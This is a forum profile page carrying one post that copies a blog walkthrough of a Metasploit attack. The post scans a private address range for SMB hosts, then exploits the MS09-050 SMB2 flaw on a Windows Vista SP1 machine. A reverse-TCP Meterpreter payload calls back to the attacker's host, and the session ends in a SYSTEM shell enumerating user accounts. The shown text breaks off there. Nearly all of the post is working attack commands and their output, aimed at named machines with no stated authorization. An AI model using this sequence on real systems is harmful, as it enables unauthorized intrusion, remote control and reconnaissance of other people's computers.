Jump to content

djmed

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

djmed's Achievements

Newbie

Newbie (1/14)

  1. http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html [o] Exploiting Vista SP1 with SMB2 [metasploit] [o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference root@evilc0de:~# msfconsole <> ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 590 exploits - 302 auxiliary + -- --=[ 224 payloads - 27 encoders - 8 nops =[ svn r10414 updated today (2010.09.21) msf > use scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255 RHOSTS => 172.16.0.1-172.16.4.255 msf auxiliary(smb_version) > set THREADS 50 THREADS => 50 msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.0.1-172.16.4.255 yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 50 yes The number of concurrent threads msf auxiliary(smb_version) > run [*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA) [*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY) [*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY) [*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY) msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > info Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference Version: 9669 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Provided by: laurent.gaffie hdm sf Available targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload information: Space: 1024 Description: This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. References: http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103 http://www.securityfocus.com/bid/36299 http://www.osvdb.org/57799 http://seclists.org/fulldisclosure/2009/Sep/0039.html http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138 RHOST => 172.16.1.138 msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12 LHOST => 172.16.1.12 msf exploit(ms09_050_smb2_negotiate_func_index) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.1.138 yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 172.16.1.12 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > exploit [*] Started reverse handler on 172.16.1.12:4444 [*] Connecting to the target (172.16.1.138:445)... [*] Sending the exploit packet (872 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (748544 bytes) to 172.16.1.138 [*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700 meterpreter > sysinfo Computer: PUPEN-SNOWBLACK OS : Windows Vista (Build 6001, Service Pack 1). Arch : x86 Language: en_US meterpreter > shell Process 1240 created. Channel 1 created. Microsoft Windows [Version 6.0.6001] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>net user net user User accounts for \\
×
×
  • Create New...